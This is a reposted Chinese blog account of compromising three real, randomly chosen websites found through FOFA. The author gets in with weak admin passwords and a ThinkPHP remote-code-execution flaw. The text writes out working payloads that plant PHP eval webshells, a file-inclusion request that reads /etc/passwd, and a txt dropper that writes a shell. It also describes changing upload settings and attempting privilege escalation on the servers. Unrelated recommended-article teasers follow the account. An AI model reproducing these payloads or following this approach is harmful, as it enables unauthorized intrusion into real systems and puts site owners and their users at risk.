记一天三个站并失败的提权过程
ccwgpt 2024-11-20 13:07 16 浏览 0 评论
欢迎搜索公众号:白帽子左一
每天分享更多黑客技能,工具及体系化视频教程
作者:Firebasky
转载自:https://xz.aliyun.com/t/9283
最近学习了一下pwn,然后就学习到了栈溢出,然后就遇到了困难。就想去看看php吧,好久没有看了,准备去看漏洞复现。然后就开始了一天三站的过程。
信息收集
因为自己太懒了,不想搭建环境,然后就想网上有好多网站啊,随便找一个去看看。hhh然后去利用fofa去搜索。
第一个shell
首先获得的是第一个网站,直接/admin.php成功到后台页面,然后肯定是admin/admin呀完美,成功进入后台(运气好)
然后我就去找漏洞利用点,找了半天都没有找到,突然在后台发现了一个报错信息。
hhh,这不是tp框架嘛!然后直接上poc,进行测试,测试发现ban了一下命令执行函数,然后我去查看phpinfo
?s=index/index
_method=__construct&filter[]=call_user_func&method=get&get[0]=phpinfo
发现ban了一下常见的命令执行函数,然后发现没有ban,shell_exec
于是说干就干,因为shell_exec函数没有回显,这里使用的dnslog进行测试。发现成功执行了命令。这不是美滋滋。
然后我就准备反弹shell,但是一直没有成功,不知道原理。那时候已经比较晚了,准备去填饱肚子。
吃了饭之后就进行日。
然后我就猜有没有可能性有写入权限,然后我测试了一下果然有写入权限。
?s=index/index
_method=__construct&filter[]=shell_exec&method=get&get[0]=echo "<?php eval(\$_POST[1]);?>" > 1.php
成功拿到shell,但是权限是www的进行提权。这里系统版本是cestos的使用脏牛漏洞和新出来的sudo提权失败。。。
虽然失败了,但是我突然对这类网站感兴趣了,于是便有了下面俩个网站的shell。
第二个shell
还是和上面一样,也是通过弱密码成功进入后台(弱密码yyds)
有了一个网站的思路,第二个就比较清晰了,不过遇到了困难是这个网站几乎ban了全部的命令执行函数,所以给我带来了困难。
因为该漏洞是通过call_user_func()函数进行的漏洞利用,所以说我们控制的参数有限。一直没有绕过这个参数的问题,想使用写入函数去执行写入shell,但是发现参数不够。(烦死了~)那时候已经是23点了,一直没有绕过,自己又不想去跟代码。。。。遇到困难回寝室睡觉。
第二天上完课,我就去实验室进行利用,在昨天晚上深思熟虑的思考之后分析,有没有可能进行文件包含包含shell。
然后就开始构造文件包含的poc
?s=index/index
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/etc/passwd&x=phpinfo();
这里成功包含成功。。。爽歪歪。
接下来就通过后台有一个上传文件的地方进行上传文件,然后包含。
然后就又遇到了困难。。。
我们上传的文件进行了hash密码算法的渲染,相当于二次渲染,也没有绕过。难受死了,所以上传照片这个路走不通了。
接下来就是找日志文件。找了好久都没有找到,于是想,上一个网站和这个网站是一样的,那么日志文件可能也一样。于是去看上一个网站的日志文件目录去测试这个网站的日志文件,果然成功包含日志文件
/www/wwwlogs/access.log
然后我就兴高采烈的去包含日志文件,结果失败??!奇奇怪怪,测试了好久都失败了。然后去看上一个网站的日志文件发现果然日志文件里面有奇奇怪怪的编码?导致我们写入的shell,不能成功识别。
再一次难受~
时间已经到下午又该上课的时候了。。。
下午在战
回到实验室,想一想思路,因为有文件上传的地方,并且服务器开起了
session.upload_progress.enabled配置
所以思路,就是我们利用session文件包含进行getshell
这部分我就不介绍了哈,网上有好多的。。
然后说干就干,准备开始找上一次的上传点,突然发现另一个上传点。我们可以上传文件(doc pdf)等等,于是我想如果我们可以上传txt文件然后进行文件包含,不是也是一样的嘛?而这里利用条件比较低,于是我就去利用上传txt文件进行包含。
经过在后台搜索了一遍,发现我们可以修改上传后缀名的配置文件,于是我成功添加了允许上传txt文件。
在txt里面写入。
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["0"])?>');?>
然后在利用最开始的文件包含漏洞去包含这个文件,成功执行命令生成shell
美滋滋。。。
这里可能你会说居然可以修改上传配置的后缀名,那为什么不能是去上传php?
这里我自己测试了一下,不能上传php的代码,至于绕过,没有去测试。。。
第三个shell
第三个shell来说是最简单的,因为没有ban system函数,使用我们直接写入shell,进行连接就OK。
总结
- 简单的说拿这个shell还是比较简单的,只是在第二个shell的时候思考了有好久,不过学习到了一下思路。真的是在渗透过程中不能放弃。
- 这一次证明了我们需要更加关注之前重新的漏洞和弱密码。
- 只不过三个shell都提权失败。。。tcl
- 下一步准备去学习一下linux提权利操作。
相关推荐
- 团队管理“布阵术”:3招让你的团队战斗力爆表!
-
为何古代军队能够以一当十?为何现代企业有的团队高效似“特种部队”,有的却松散若“游击队”?**答案正隐匿于“布阵术”之中!**今时今日,让我们从古代兵法里萃取3个核心要义,助您塑造一支战斗力爆棚的...
- 知情人士回应字节大模型团队架构调整
-
【知情人士回应字节大模型团队架构调整】财联社2月21日电,针对原谷歌DeepMind副总裁吴永辉加入字节跳动后引发的团队调整问题,知情人士回应称:吴永辉博士主要负责AI基础研究探索工作,偏基础研究;A...
- 豆包大模型团队开源RLHF框架,训练吞吐量最高提升20倍
-
强化学习(RL)对大模型复杂推理能力提升有关键作用,但其复杂的计算流程对训练和部署也带来了巨大挑战。近日,字节跳动豆包大模型团队与香港大学联合提出HybridFlow。这是一个灵活高效的RL/RL...
- 创业团队如何设计股权架构及分配(创业团队如何设计股权架构及分配方案)
-
创业团队的股权架构设计,决定了公司在随后发展中呈现出的股权布局。如果最初的股权架构就存在先天不足,公司就很难顺利、稳定地成长起来。因此,创业之初,对股权设计应慎之又慎,避免留下巨大隐患和风险。两个人如...
- 消息称吴永辉入职后引发字节大模型团队架构大调整
-
2月21日,有消息称前谷歌大佬吴永辉加入字节跳动,并担任大模型团队Seed基础研究负责人后,引发了字节跳动大模型团队架构大调整。多名原本向朱文佳汇报的算法和技术负责人开始转向吴永辉汇报。简单来说,就是...
- 31页组织效能提升模型,经营管理团队搭建框架与权责定位
-
分享职场干货,提升能力!为职场精英打造个人知识体系,升职加薪!31页组织效能提升模型如何拿到分享的源文件:请您关注本头条号,然后私信本头条号“文米”2个字,按照操作流程,专人负责发送源文件给您。...
- 异形柱结构(异形柱结构技术规程)
-
下列关于混凝土异形柱结构设计的说法,其中何项正确?(A)混凝土异形柱框架结构可用于所有非抗震和抗震设防地区的一般居住建筑。(B)抗震设防烈度为6度时,对标准设防类(丙类)采用异形柱结构的建筑可不进行地...
- 职场干货:金字塔原理(金字塔原理实战篇)
-
金字塔原理的适用范围:金字塔原理适用于所有需要构建清晰逻辑框架的文章。第一篇:表达的逻辑。如何利用金字塔原理构建基本的金字塔结构受众(包括读者、听众、观众或学员)最容易理解的顺序:先了解主要的、抽象的...
- 底部剪力法(底部剪力法的基本原理)
-
某四层钢筋混凝土框架结构,计算简图如图1所示。抗震设防类别为丙类,抗震设防烈度为8度(0.2g),Ⅱ类场地,设计地震分组为第一组,第一自振周期T1=0.55s。一至四层的楼层侧向刚度依次为:K1=1...
- 结构等效重力荷载代表值(等效重力荷载系数)
-
某五层钢筋混凝土框架结构办公楼,房屋高度25.45m。抗震设防烈度8度,设防类别丙类,设计基本地震加速度0.2g,设计地震分组第二组,场地类别为Ⅱ类,混凝土强度等级C30。该结构平面和竖向均规则。假定...
- 体系结构已成昭告后世善莫大焉(体系构架是什么意思)
-
实践先行也理论已初步完成框架结构留余后人后世子孙俗话说前人栽树后人乘凉在夏商周大明大清民国共和前人栽树下吾之辈已完成结构体系又俗话说青出于蓝而胜于蓝各个时期任务不同吾辈探索框架结构体系经历有限肯定发展...
- 框架柱抗震构造要求(框架柱抗震设计)
-
某现浇钢筋混凝土框架-剪力墙结构高层办公楼,抗震设防烈度为8度(0.2g),场地类别为Ⅱ类,抗震等级:框架二级,剪力墙一级,混凝土强度等级:框架柱及剪力墙C50,框架梁及楼板C35,纵向钢筋及箍筋均采...
- 梁的刚度、挠度控制(钢梁挠度过大会引起什么原因)
-
某办公楼为现浇钢筋混凝土框架结构,r0=1.0,混凝土强度等级C35,纵向钢筋采用HRB400,箍筋采用HPB300。其二层(中间楼层)的局部平面图和次梁L-1的计算简图如图1~3(Z)所示,其中,K...
- 死要面子!有钱做大玻璃窗,却没有钱做“柱和梁”,不怕房塌吗?
-
活久见,有钱做2层落地大玻璃窗,却没有钱做“柱子和圈梁”,这样的农村自建房,安全吗?最近刷到个魔幻施工现场,如下图,这栋5开间的农村自建房,居然做了2个全景落地窗仔细观察,这2个落地窗还是飘窗,为了追...
- 不是承重墙,物业也不让拆?话说装修就一定要拆墙才行么
-
最近发现好多朋友装修时总想拆墙“爆改”空间,别以为只要避开承重墙就能随便砸!我家楼上邻居去年装修,拆了阳台矮墙想扩客厅,结果物业直接上门叫停。后来才知道,这种配重墙拆了会让阳台承重失衡,整栋楼都可能变...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- MVC框架 (46)
- spring框架 (46)
- 框架图 (58)
- bootstrap框架 (43)
- flask框架 (53)
- quartz框架 (51)
- abp框架 (47)
- jpa框架 (47)
- laravel框架 (46)
- express框架 (43)
- scrapy框架 (52)
- beego框架 (42)
- java框架spring (43)
- grpc框架 (55)
- 前端框架bootstrap (42)
- orm框架有哪些 (43)
- ppt框架 (48)
- 内联框架 (52)
- winform框架 (46)
- gui框架 (44)
- cad怎么画框架 (58)
- ps怎么画框架 (47)
- ssm框架实现登录注册 (49)
- oracle字符串长度 (48)
- oracle提交事务 (47)